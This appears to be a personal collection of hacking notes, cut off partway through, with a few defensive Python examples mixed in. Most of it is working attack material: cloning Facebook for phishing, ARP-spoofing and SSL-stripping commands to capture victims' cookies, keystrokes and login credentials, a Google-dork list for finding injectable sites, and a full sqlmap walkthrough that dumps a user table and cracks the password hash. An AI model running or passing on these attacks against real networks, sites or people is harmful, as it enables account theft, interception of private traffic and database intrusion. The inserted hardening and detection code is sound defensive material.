- Cloning a site for phishing

 

https://github.com/evait-security/weeman

 

weeman > show

    --------------------

    url          : none

    port         : 8080

    action_url   : none

    user_agent   : Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

    html_file    : None

    external_js  : None

    --------------------

weeman > set url http://www.facebook.com

weeman > set action_url 31.13.86.36

weeman > show

    --------------------

    url          : http://www.facebook.com

    port         : 8080

    action_url   : 31.13.86.36

    user_agent   : Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

    html_file    : None

    external_js  : None

    --------------------

weeman > run

 

 

 

 

- Sniffing cookies with arpspoof

 

Install:

apt-get install ferret-sidejack

 

Enable arpspoof and IP packet forwarding (ip_forward):

 

# arpspoof -i wlan0 -t 192.168.1.1(gw) 192.168.1.3(victim)

# arpspoof -i wlan0 -t 192.168.1.3(victim) 192.168.1.1(gw)

# echo '1' > /proc/sys/net/ipv4/ip_forward

# mitmf -i wlan0 --spoof --dns --hsts --gateway <router_ip> --target <victim_ip>

Run ferret:

# ferret -i wlan0

Run the graphical interface:

# hamster

Connect with a browser to 127.0.0.1:1234

to see all intercepted cookies and to open the visited pages without being asked to log in.

 

 

- Sqlmap injection

 

Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website

 

This list is really long. It took me a long time to collect them. If you know SQL you can add more; put them in the comment section and I will add them here.

Google Dork strings (three columns):

inurl:item_id= inurl:review.php?id= inurl:hosting_info.php?id=

inurl:newsid= inurl:iniziativa.php?in= inurl:gallery.php?id=

inurl:trainers.php?id= inurl:curriculum.php?id= inurl:rub.php?idr=

inurl:news-full.php?id= inurl:labels.php?id= inurl:view_faq.php?id=

inurl:news_display.php?getid= inurl:story.php?id= inurl:artikelinfo.php?id=

inurl:index2.php?option= inurl:look.php?ID= inurl:detail.php?ID=

inurl:readnews.php?id= inurl:newsone.php?id= inurl:index.php?=

inurl:top10.php?cat= inurl:aboutbook.php?id= inurl:profile_view.php?id=

inurl:newsone.php?id=    inurl:material.php?id=    inurl:category.php?id=

inurl:event.php?id=    inurl:opinions.php?id=    inurl:publications.php?id=

inurl:product-item.php?id=    inurl:announce.php?id=    inurl:fellows.php?id=

inurl:sql.php?id=    inurl:rub.php?idr=    inurl:downloads_info.php?id=

inurl:index.php?catid=    inurl:galeri_info.php?l=    inurl:prod_info.php?id=

inurl:news.php?catid=    inurl:tekst.php?idt=    inurl:shop.php?do=part&id=

inurl:index.php?id=    inurl:newscat.php?id=    inurl:productinfo.php?id=

inurl:news.php?id=    inurl:newsticker_info.php?idn=    inurl:collectionitem.php?id=

inurl:index.php?id=    inurl:rubrika.php?idr=    inurl:band_info.php?id=

inurl:trainers.php?id=    inurl:rubp.php?idr=    inurl:product.php?id=

inurl:buy.php?category=    inurl:offer.php?idf=    inurl:releases.php?id=

inurl:article.php?ID=    inurl:art.php?idm=    inurl:ray.php?id=

inurl:play_old.php?id=    inurl:title.php?id=    inurl:produit.php?id=

inurl:declaration_more.php?decl_id=    inurl:news_view.php?id=    inurl:pop.php?id=

inurl:pageid=    inurl:select_biblio.php?id=    inurl:shopping.php?id=

inurl:games.php?id=    inurl:humor.php?id=    inurl:productdetail.php?id=

inurl:page.php?file=    inurl:aboutbook.php?id=    inurl:post.php?id=

inurl:newsDetail.php?id=    inurl:ogl_inet.php?ogl_id=    inurl:viewshowdetail.php?id=

inurl:gallery.php?id=    inurl:fiche_spectacle.php?id=    inurl:clubpage.php?id=

inurl:article.php?id=    inurl:communique_detail.php?id=    inurl:memberInfo.php?id=

inurl:show.php?id=    inurl:sem.php3?id=    inurl:section.php?id=

inurl:staff_id=    inurl:kategorie.php4?id=    inurl:theme.php?id=

inurl:newsitem.php?num=    inurl:news.php?id=    inurl:page.php?id=

inurl:readnews.php?id=    inurl:index.php?id=    inurl:shredder-categories.php?id=

inurl:top10.php?cat=    inurl:faq2.php?id=    inurl:tradeCategory.php?id=

inurl:historialeer.php?num=    inurl:show_an.php?id=    inurl:product_ranges_view.php?ID=

inurl:reagir.php?num=    inurl:preview.php?id=    inurl:shop_category.php?id=

inurl:Stray-Questions-View.php?num=    inurl:loadpsb.php?id=    inurl:transcript.php?id=

inurl:forum_bds.php?num=    inurl:opinions.php?id=    inurl:channel_id=

inurl:game.php?id=    inurl:spr.php?id=    inurl:aboutbook.php?id=

inurl:view_product.php?id=    inurl:pages.php?id=    inurl:preview.php?id=

inurl:newsone.php?id=    inurl:announce.php?id=    inurl:loadpsb.php?id=

inurl:sw_comment.php?id=    inurl:clanek.php4?id=    inurl:pages.php?id=

inurl:news.php?id=    inurl:participant.php?id=    

inurl:avd_start.php?avd=    inurl:download.php?id=    

inurl:event.php?id=    inurl:main.php?id=    

inurl:product-item.php?id=    inurl:review.php?id=    

inurl:sql.php?id=    inurl:chappies.php?id=    

inurl:material.php?id=    inurl:read.php?id=    

inurl:clanek.php4?id=    inurl:prod_detail.php?id=    

inurl:announce.php?id=    inurl:viewphoto.php?id=    

inurl:chappies.php?id=    inurl:article.php?id=    

inurl:read.php?id=    inurl:person.php?id=    

inurl:viewapp.php?id=    inurl:productinfo.php?id=    

inurl:viewphoto.php?id=    inurl:showimg.php?id=    

inurl:rub.php?idr=    inurl:view.php?id=    

inurl:galeri_info.php?l=    inurl:website.php?id=    

Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection

 

For every string shown above you will get hundreds of search results. How do you know which one is really vulnerable to SQLMAP SQL injection? There are multiple ways, and I am sure people would argue about which one is best, but to me the following is the simplest and most conclusive.

 

Let’s say you searched using this string inurl:item_id= and one of the search result shows a website like this:

 

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15

 

Just add a single quotation mark ' at the end of the URL. (Just to be sure: " is a double quotation mark and ' is a single quotation mark.)

 

So now your URL will become like this:

 

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'

 

If the page returns an SQL error, the page is vulnerable to SQLMAP SQL injection. If it loads normally or redirects you to a different page, move on to the next site in your Google search results.
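As an added example (not from the tutorial quoted above), the following Python shows why the trailing quote produces an error and what the fix looks like on the server side: the same lookup written by string concatenation, as the vulnerable site does, and with a bound parameter. The `item` table and its rows are constructed here to stand in for the item.cgi endpoint.

```python
import sqlite3

# Constructed sample data standing in for the item.cgi?item_id= endpoint.
_ROWS = [(15, "Widget"), (16, "Gadget"), (17, "Doohickey")]


def _connect():
    """Fresh in-memory database with the constructed item table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE item (item_id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO item VALUES (?, ?)", _ROWS)
    return conn


def lookup_vulnerable(item_id):
    """Query built by string concatenation, as the vulnerable site does.

    Returns the matching names, or the string "SQL error" when the database
    rejects the statement (the symptom Step 1.b looks for).  Note that an
    error is only the visible symptom: input that keeps the SQL well-formed
    changes the query logic silently instead.
    """
    conn = _connect()
    try:
        sql = "SELECT name FROM item WHERE item_id = " + item_id + " ORDER BY item_id"
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.OperationalError:
        return "SQL error"
    finally:
        conn.close()


def lookup_safe(item_id):
    """Hardened version: the value is bound as a parameter and never spliced into SQL.

    Whatever the caller sends is compared as a value; it cannot alter the statement.
    """
    conn = _connect()
    try:
        rows = conn.execute(
            "SELECT name FROM item WHERE item_id = ? ORDER BY item_id", (item_id,)
        )
        return [row[0] for row in rows]
    finally:
        conn.close()


if __name__ == "__main__":
    for probe in ("15", "15'", "15 OR 1=1"):
        print(repr(probe), "->", lookup_vulnerable(probe), "|", lookup_safe(probe))
```

The concatenated version errors on `15'` (the unterminated string literal the tutorial relies on) and returns every row for `15 OR 1=1`; the parameterised version returns the single item for `15` and nothing at all for either malformed value.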

 

Step 2: List DBMS databases using SQLMAP SQL Injection

 

As you can see from the screenshot above, I've found a website vulnerable to SQLMAP SQL injection. Now I need to list all the databases on that vulnerable server (this is also called enumerating the number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable.

 

Run the following command against the vulnerable website:

 

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs

 

In here:

sqlmap = name of the sqlmap binary

-u = target URL (e.g. "http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15")

--dbs = enumerate DBMS databases

 

This command reveals quite a bit of interesting information:

 

web application technology: Apache

back-end DBMS: MySQL 5.0

[10:55:53] [INFO] retrieved: information_schema

[10:55:56] [INFO] retrieved: sqldummywebsite

[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'

 

So we now have two databases that we can look into. information_schema is a standard database on almost every MySQL server, so our interest is in the sqldummywebsite database.

 

Step 3: List tables of target database using SQLMAP SQL Injection

 

Now we need to know how many tables this sqldummywebsite database has and what their names are. To find out, use the following command:


sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables

 

Sweet, this database has 8 tables.

 

[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'

[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'

[10:56:22] [INFO] the SQL query used returns 8 entries

[10:56:25] [INFO] retrieved: item

[10:56:27] [INFO] retrieved: link

[10:56:30] [INFO] retrieved: other

[10:56:32] [INFO] retrieved: picture

[10:56:34] [INFO] retrieved: picture_tag

[10:56:37] [INFO] retrieved: popular_picture

[10:56:39] [INFO] retrieved: popular_tag

[10:56:42] [INFO] retrieved: user_info

 

Step 4: List columns on target table of selected database using SQLMAP SQL Injection

 

Now we need to list all the columns on target table user_info of sqldummywebsite database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:

 

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns

 

This returns 5 entries from target table user_info of sqldummywebsite database.

 

[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'

[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'

[10:57:18] [INFO] the SQL query used returns 5 entries

[10:57:20] [INFO] retrieved: user_id

[10:57:22] [INFO] retrieved: int(10) unsigned

[10:57:25] [INFO] retrieved: user_login

[10:57:27] [INFO] retrieved: varchar(45)

[10:57:32] [INFO] retrieved: user_password

[10:57:34] [INFO] retrieved: varchar(255)

[10:57:37] [INFO] retrieved: unique_id

[10:57:39] [INFO] retrieved: varchar(255)

[10:57:41] [INFO] retrieved: record_status

[10:57:43] [INFO] retrieved: tinyint(4)

 

AHA! This is exactly what we are looking for: the target columns user_login and user_password.

 

Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection

 

SQLMAP SQL injection makes it easy! Just run the following command again:

 

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump

 

Guess what, we now have the username from the database:

 

[10:58:39] [INFO] retrieved: userX

[10:58:40] [INFO] analyzing table dump for possible password hashes

 

Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection

 

You're probably getting used to how the SQLMAP SQL injection tool works by now. Use the following command to extract the password for the user.

 

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump

 

TADA!! We have the password.

 

[10:59:15] [INFO] the SQL query used returns 1 entries

[10:59:17] [INFO] retrieved: 24iYBc17xK0e.

[10:59:18] [INFO] analyzing table dump for possible password hashes

Database: sqldummywebsite

Table: user_info

[1 entry]

+---------------+

| user_password |

+---------------+

| 24iYBc17xK0e. |

+---------------+

 

Step 7: Cracking password

 

So the hashed password is 24iYBc17xK0e. (the trailing dot is part of the hash). How do you know what type of hash that is?

Step 7.a: Identify Hash type

 

Luckily, Kali Linux provides a nice tool we can use to identify which type of hash this is. On the command line type the following command and, at the prompt, paste the hash value:

 

hash-identifier

 

Excellent. So this is DES(Unix) hash.

Step 7.b: Crack HASH using cudahashcat

 

First of all I need to know which code to use for DES hashes. So let’s check that:

 

cudahashcat --help | grep DES

 

So it's either 1500 or 3100. But it was a MySQL database, so it must be 1500.

 

I am running a computer that has an NVIDIA graphics card, which means I will be using cudaHashcat. On my laptop I have an AMD ATI graphics card, so there I will be using oclHashcat. If you're on VirtualBox or VMware, neither cudaHashcat nor oclHashcat will work; you must install Kali on either a persistent USB or a hard disk. Instructions are on the website, search around.

 

I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running:

 

cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt

 

Interesting find: the usual Hashcat was unable to determine the code for DES hashes (it is not in its help menu). However, both cudaHashcat and oclHashcat found and cracked the key.

 

Anyhow, here's the cracked password: abc123 (24iYBc17xK0e.:abc123).

 

Sweet, we now even have the password for this user.
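As an added example (not part of the tutorial above), the following Python covers the two things a defender takes from Step 7: a small format classifier in the spirit of hash-identifier, and what the `user_password` column should have stored instead. Traditional DES crypt uses a 12-bit salt and only the first 8 characters of the password, which is why a wordlist cracks it in seconds; a salted, slow key-derivation function makes that attack cost real time per guess. The signature table and the `pbkdf2_sha256$...` storage format are my own constructions, not from any tool on this page.

```python
import hashlib
import hmac
import os
import re

# Constructed signature table: the formats most often met in web-application dumps.
# Order matters only for readability; a value may legitimately match several.
_SIGNATURES = [
    ("DES(Unix)", re.compile(r"^[./0-9A-Za-z]{13}$")),
    ("MD5(Unix)", re.compile(r"^\$1\$[./0-9A-Za-z]{1,8}\$[./0-9A-Za-z]{22}$")),
    ("SHA-512(Unix)", re.compile(r"^\$6\$(rounds=\d+\$)?[./0-9A-Za-z]{1,16}\$[./0-9A-Za-z]{86}$")),
    ("bcrypt", re.compile(r"^\$2[aby]\$\d{2}\$[./0-9A-Za-z]{53}$")),
    ("MySQL 4.1+", re.compile(r"^\*[0-9A-F]{40}$")),
    ("MD5", re.compile(r"^[0-9a-f]{32}$")),
    ("SHA-1", re.compile(r"^[0-9a-f]{40}$")),
]


def identify_hash(value):
    """Return the names of every signature the hash string matches (empty if none)."""
    return [name for name, rx in _SIGNATURES if rx.match(value)]


def hash_password(password, salt=None, iterations=600_000):
    """Derive a storable password hash: random per-user salt + PBKDF2-HMAC-SHA256.

    The result is self-describing, "pbkdf2_sha256$<iterations>$<salt_hex>$<dk_hex>",
    so the parameters can be raised later without breaking old records.
    """
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute the derived key from the stored parameters and compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("24iYBc17xK0e. looks like:", identify_hash("24iYBc17xK0e."))
    record = hash_password("abc123")
    print("stored as:", record)
    print("verify abc123:", verify_password("abc123", record))
```

`identify_hash` is deliberately a plain regex table: like hash-identifier it can only say what a string is shaped like, not what produced it, so a 32-hex-digit value is reported as MD5 even if the application actually used an unsalted MD5 of something else.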

 

 

 

- Getting information about a domain/IP

 

dmitry -winsepo output.txt domain.com

 

Or use discover:

 

git clone https://github.com/leebaird/discover /opt/discover

cd /opt/discover

./update

./discover.sh

Choose 1 (Domain), then 1 (Passive); enter the company name and the domain name. When the scan finishes, open the report:

firefox /root/data/domain/index.html

 

 

- Mass scanning, nmap-style

 

masscan -p80,8000-8100 10.0.1.0/24

 

- Keylogger and screenshot hack

 

N.B.: in case of errors, install Twisted version 15.5.0:

 

pip install Twisted==15.5.0

 

Enable arpspoof and IP packet forwarding (ip_forward):

 

# arpspoof -i wlan0 -t 192.168.1.1(gw) 192.168.1.3(victim)

# arpspoof -i wlan0 -t 192.168.1.3(victim) 192.168.1.1(gw)

# echo '1' > /proc/sys/net/ipv4/ip_forward

Start the Man-in-the-Middle Framework with the --jskeylogger option enabled for the keylogger:

mitmf -i wlan0 --spoof --dns --jskeylogger --gateway <router_ip> --target <victim_ip>

Start the Man-in-the-Middle Framework with the --screen option enabled for screenshots:

mitmf -i wlan0 --spoof --dns --screen --gateway <router_ip> --target <victim_ip>

Alternatively, start the Man-in-the-Middle Framework with the --arp option:

mitmf -i wlan0 --spoof --dns --arp --jskeylogger --gateway <router_ip> --target <victim_ip>

 

 

- SSL stripping with sslstrip

 

sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks.

 

It requires Python 2.5 or newer, along with the 'twisted' python module.

 

Installing:

        pip install sslstrip

 

Running:

        sslstrip can be run from the source base without installation.
        Just run 'python sslstrip.py -h' as a non-root user to get the
        command-line options.

 

        The four steps to getting this working (assuming you're running Linux) are:

 

        1) Flip your machine into forwarding mode (as root):

           echo "1" > /proc/sys/net/ipv4/ip_forward

 

        2) Setup iptables to intercept HTTP requests (as root):

           iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>

        

        3) Run sslstrip with the command-line options you'd like (see above).

 

        4) Run arpspoof to redirect traffic to your machine (as root):

           arpspoof -i <yourNetworkDevice> -t <yourTarget> <theRoutersIpAddress>

           arpspoof -i <yourNetworkDevice> -t <theRoutersIpAddress> <yourTarget>

More Info: http://www.thoughtcrime.org/software/sslstrip/
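The server-side defence against SSL stripping is HSTS (Strict-Transport-Security): once a browser has seen the header it refuses to talk plain HTTP to that host, which is why the `--hsts` switch in the mitmf commands above and the sslstrip2/dns2proxy procedure further down exist at all. As an added example, not part of sslstrip or this page, the following Python grades an HSTS header the way a defender auditing their own site would; the SAMPLE_RESPONSES are constructed, and the one-year threshold is the minimum the browser preload list requires.

```python
# Constructed response header sets standing in for what a site returns over HTTPS.
SAMPLE_RESPONSES = {
    "good": {"Strict-Transport-Security": "max-age=31536000; includeSubDomains; preload"},
    "short": {"Strict-Transport-Security": "max-age=300"},
    "missing": {"Content-Type": "text/html"},
    "disabled": {"Strict-Transport-Security": "max-age=0"},
}

MIN_MAX_AGE = 31536000  # one year in seconds, required for preload submission


def parse_hsts(header_value):
    """Parse an HSTS header into its directives.

    Returns {"max-age": int or None, "includeSubDomains": bool, "preload": bool}.
    Directive names are case-insensitive; an unparsable max-age is reported as None,
    which browsers treat as "no policy".
    """
    result = {"max-age": None, "includeSubDomains": False, "preload": False}
    for directive in header_value.split(";"):
        name, _, value = directive.strip().partition("=")
        name = name.lower()
        if name == "max-age":
            try:
                result["max-age"] = int(value.strip().strip('"'))
            except ValueError:
                pass
        elif name == "includesubdomains":
            result["includeSubDomains"] = True
        elif name == "preload":
            result["preload"] = True
    return result


def assess_hsts(headers):
    """Return a list of findings for a response; an empty list means the policy is strong."""
    # HTTP header names are case-insensitive, so do not rely on exact spelling.
    value = next(
        (v for k, v in headers.items() if k.lower() == "strict-transport-security"), None
    )
    if value is None:
        return ["no HSTS header: every plain-http request can be stripped"]
    p = parse_hsts(value)
    findings = []
    if p["max-age"] is None:
        findings.append("max-age missing or unparsable: browsers ignore the header")
    elif p["max-age"] == 0:
        findings.append("max-age=0: this clears an existing policy instead of setting one")
    elif p["max-age"] < MIN_MAX_AGE:
        findings.append(f"max-age {p['max-age']} is below one year")
    if not p["includeSubDomains"]:
        findings.append("includeSubDomains missing: subdomains remain strippable")
    if not p["preload"]:
        findings.append("preload missing: the very first visit relies on a plain-http redirect")
    return findings


if __name__ == "__main__":
    for name, headers in SAMPLE_RESPONSES.items():
        print(name, "->", assess_hsts(headers) or "ok")
```

Even a perfect header only protects browsers that have already visited the site (or have it on the preload list); the first plain-http request is the window sslstrip works in, which is why the preload directive is in the check.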

 

 

- arpspoof, sslstrip, bettercap, mitmf

 

bettercap can be used instead of sslstrip with the command:

bettercap -T <victim_ip> --proxy -P POST

With this command only the victim's POST requests are sniffed.

To sniff all traffic:

bettercap -X

 

The mitmf framework can also be used:

apt-get install mitmf

and then run:

mitmf -i wlan0 --spoof --arp --dns --gateway <router_ip> --target <victim_ip>

 

Scan the network with nmap to see all active hosts:

nmap -sn -PR 192.168.1.0/24

or with:

nmap -sP 192.168.1.0/24

As an alternative to nmap, the netdiscover command can be used.

Enable IP forwarding on our machine (I use BackTrack) so that the packets reaching us are redirected to their proper destination; otherwise they would stop once they reached us:

# echo '1' > /proc/sys/net/ipv4/ip_forward

On Linux:

echo 1 > /proc/sys/net/ipv4/ip_forward

On BSD:

sysctl -w net.inet.ip.forwarding=1

Check that IP forwarding is enabled with:

# cat /proc/sys/net/ipv4/ip_forward

which should return 1, indicating that IP forwarding is enabled.

Now we need to poison the ARP tables of the router and of the victim. Open a terminal and run (one per tab or terminal):

# arpspoof -i wlan0 -t 192.168.1.1(gw) 192.168.1.3(victim)

This first command is very often unnecessary; the second one alone is enough, namely:

# arpspoof -i wlan0 -t 192.168.1.3(victim) 192.168.1.1(gw)

The router's IP is usually something like 192.168.1.1 or 192.168.0.1; check your router's manual if you don't know the address, or use a tool like netdiscover. To find the victim machine's address, run ipconfig (Windows) or ifconfig (Linux) on the virtual machine and read the associated IP (or, again, use netdiscover). In my case the victim virtual machine is at 192.168.1.3, my BackTrack at 192.168.1.15, my router at 192.168.1.1, and my network interface is called wlan0.

You will see output that keeps repeating (don't stop the command, obviously!); reading it you will see it is exactly what was described above: we send ARP replies telling the router that the victim's MAC is ours (first command) and vice versa (second command).
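ARP poisoning of this kind (also the basis of the cookie-sniffing and keylogger sections earlier on this page) leaves two traces on the wire that a monitor can watch for: a known IP suddenly answering from a different MAC, and one MAC claiming several IPs at once. As an added example, not part of this page or of arpspoof, the following Python applies those two rules to a stream of ARP replies in the `ip is-at mac` form that tcpdump prints; SAMPLE_ARP_REPLIES reuses the 192.168.1.x addresses from the text and is constructed, and the optional `trusted` table of known-good bindings is an assumed input.

```python
import re
from collections import defaultdict

# Constructed ARP replies. The first three are the honest bindings for the
# router (.1), the victim (.3) and a third host (.15); the last two mimic the
# poisoning described above, where .15's MAC is advertised for both .1 and .3.
SAMPLE_ARP_REPLIES = """\
192.168.1.1 is-at aa:bb:cc:00:00:01
192.168.1.3 is-at aa:bb:cc:00:00:03
192.168.1.15 is-at aa:bb:cc:00:00:15
192.168.1.1 is-at aa:bb:cc:00:00:15
192.168.1.3 is-at aa:bb:cc:00:00:15
"""

_REPLY_RE = re.compile(
    r"^(\d{1,3}(?:\.\d{1,3}){3}) is-at ([0-9a-f]{2}(?::[0-9a-f]{2}){5})$", re.I
)


def parse_arp_replies(text):
    """Parse 'ip is-at mac' lines into (ip, mac) pairs; MACs lower-cased, other lines skipped."""
    pairs = []
    for line in text.splitlines():
        m = _REPLY_RE.match(line.strip())
        if m:
            pairs.append((m.group(1), m.group(2).lower()))
    return pairs


def detect_arp_spoofing(pairs, trusted=None):
    """Flag the two symptoms of ARP poisoning in a sequence of (ip, mac) replies.

    "flip":      an IP answers from a MAC different from its first-seen (or trusted) one.
    "duplicate": a single MAC has now claimed more than one IP.
    `trusted` is an optional {ip: mac} table of known-good bindings (e.g. the gateway),
    which is never overwritten by what the wire says.
    Returns a list of (kind, ip, mac, detail) tuples in the order they were observed.
    """
    bindings = dict(trusted or {})
    ips_by_mac = defaultdict(set)
    for ip, mac in bindings.items():
        ips_by_mac[mac].add(ip)
    alerts = []
    for ip, mac in pairs:
        known = bindings.get(ip)
        if known is not None and known != mac:
            alerts.append(("flip", ip, mac, f"previously {known}"))
        else:
            bindings[ip] = mac  # first sighting becomes the baseline
        ips_by_mac[mac].add(ip)
        if len(ips_by_mac[mac]) > 1:
            others = sorted(ips_by_mac[mac] - {ip})
            alerts.append(("duplicate", ip, mac, "also claims " + ", ".join(others)))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(parse_arp_replies(SAMPLE_ARP_REPLIES)):
        print(*alert)
```

The "duplicate" rule will also fire for legitimate hosts that own several addresses (a router with multiple interfaces, a VRRP pair), so in practice it is paired with an allowlist of such MACs; the "flip" rule is the stronger signal, and seeding `trusted` with the gateway's real MAC means the very first poisoned reply is caught rather than silently becoming the baseline.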

Only sslstrip is missing. Redirect HTTP traffic to sslstrip so it can do its job, and start the program:

# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

# python sslstrip.py

Open a new tab or terminal and launch ettercap:

# ettercap -Tqu -i wlan0

Run ettercap -h for information about the options being passed.

 

Install Wireshark and analyze manually what happens on the network. Start it, select your network interface and click Start. In the "filter" field enter:

ip.addr == <victim_ip> and http.request.method == "POST"

This filters only the POST requests from the victim machine. Log in (for example to Libero) from the victim machine, go back to Wireshark and choose "Capture -> Stop"; you should have a single result. Click it and, in the bottom pane, scroll to the end: you will see something like "LOGINID=mitm_this_mail%40libero.it&PASSWORD=ThisIsMyPassword", which are exactly the credentials I entered. For a screenshot see: http://tinypic.com/r/2lkqqlf/6

Ettercap does not recognize the LOGINID/PASSWORD pair, so we need to modify its filters. Nothing simpler: open the file "/usr/local/share/ettercap/etter.fields" (on BackTrack) and add "loginid" to the "[USER]" section, the only filter missing for Libero. Save the file, restart ettercap and try logging in to Libero again.

Instructions for sslstrip2

First of all, make sure the system is up to date by checking for updates:

apt-get update

apt-get upgrade

Now download the two tools mentioned, SSLStrip2 and Dns2Proxy, extract them from their archives and move into the sslstrip2 folder in a terminal. Install it by typing:

python setup.py install

Once done, enable IP forwarding and set the iptables rules needed for it to work:

echo "1" > /proc/sys/net/ipv4/ip_forward

iptables --flush

iptables --flush -t nat

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8000

iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53

 

Now the attack proper can begin. Move into the dns2proxy directory and launch it by typing:

python dns2proxy.py -i <interface>

The interface must be specified if it is not the default one, namely eth0.

Then also launch sslstrip2 listening on port 8000:

sslstrip -l 8000 -a

Finally, use arpspoof to intercept the data:

arpspoof -i wlan0 -t <victim_ip> <router_ip>

You will certainly notice that the attack is not perfect: some sites will still manage to keep the connection secure, while others will cause an error in the program, which fails to reach the site's real DNS. Still, with a good success rate we can be satisfied.

Download:

https://github.com/byt3bl33d3r/MITMf

 

 

- Encrypting files with gpg or openssl

 

If you don't want to encrypt your files with a public/private key pair and use just symmetric encryption with a pass phrase instead, use the following command:

gpg --symmetric --cipher-algo aes256 files.tar.gz

You will be asked for your pass phrase. After that an encrypted file named files.tar.gz.gpg is created.

To decrypt use the command

gpg --decrypt files.tar.gz.gpg > files.tar.gz

For my part, I mainly use two methods:

First method: tar and openssl

Tar the directory

tar cvf backup.tar /path/to/folder

You can remove the [v] switch from the tar command to switch off the verbose mode.

Encrypt

openssl aes-128-cbc -salt -in backup.tar -out backup.tar.aes -k yourpassword

You can change aes-128-cbc to any other cipher method openssl supports (openssl --help).

Decrypt

openssl aes-128-cbc -d -salt -in backup.tar.aes -out backup.restored.tar

It will ask for the password.

 

 

- Decode rot13 from the command line

 

echo "Rkcybvg Fuvg" | tr '[A-Za-z]' '[N-ZA-Mn-za-m]'

 

Result:

 

Exploit Shift

 

 

- Extract IP addresses from a text file

grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' file.txt
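An added example, not part of the original notes, that does the same extraction in Python but also rejects candidates the grep pattern accepts even though they are not addresses (octets above 255, or a dotted quad glued to extra digits). The sample text is constructed for the example.

```python
import ipaddress
import re
from typing import List

# Dotted-quad candidates. The lookarounds refuse a match that is glued to
# more digits or dots, so "1234.5.6.7" does not yield a bogus "234.5.6.7"
# the way a bare `grep -o` on the same pattern does.
_DOTTED_QUAD = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")

# Constructed sample input (not a real log): valid addresses, a repeat,
# an address with a port suffix, and three values that only look like IPs.
SAMPLE_TEXT = """\
Jan 12 10:01:02 fw kernel: IN=eth0 SRC=203.0.113.7 DST=10.0.0.5 PROTO=TCP
Jan 12 10:01:03 fw kernel: IN=eth0 SRC=203.0.113.7 DST=10.0.0.5 PROTO=TCP
conn from 192.0.2.44:51234 to 10.0.0.5:443
bogus values: 999.1.1.1 192.168.1.300 1234.5.6.7
"""


def extract_ipv4(text: str, unique: bool = True) -> List[str]:
    """Return the syntactically valid IPv4 addresses found in text.

    Candidates come from the regex; ipaddress.IPv4Address then rejects
    anything with an octet above 255 (and, on Python 3.9.5+, leading
    zeros). With unique=True each address is reported once, in order of
    first appearance.
    """
    found: List[str] = []
    for match in _DOTTED_QUAD.finditer(text):
        candidate = match.group(1)
        try:
            addr = str(ipaddress.IPv4Address(candidate))
        except ValueError:
            continue  # has the right shape but is not a real address
        if unique and addr in found:
            continue
        found.append(addr)
    return found


if __name__ == "__main__":
    for ip in extract_ipv4(SAMPLE_TEXT):
        print(ip)
```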

 

 

 

- Secure file deletion on Linux with srm

 

srm is a secure replacement for rm(1). Unlike the standard rm, it overwrites the data in the target files before unlinking them. This prevents command-line recovery of the data by examining the raw block device. It may also help frustrate physical examination of the disk, although it's unlikely that it can completely prevent that type of recovery. It is, essentially, a paper shredder for sensitive files.

 

http://srm.sourceforge.net/

 

 

 

- IP spoofing with scapy and python

 

suppose we have an Apache server with the directive:

 

Allow from 192.168.149.135 

 

the server's IP is: 192.168.149.1

 

our IP is: 192.168.149.139

 

change the source IP address with iptables:

iptables -t nat -A POSTROUTING -d 192.168.149.1 -j SNAT --to-source 192.168.149.135 

 

spoof the MAC address:

 

# scapy 

>>> e = Ether() 

>>> e.show() 

 

WARNING: Mac address to reach destination not found. Using broadcast. 

###[ Ethernet ]### 

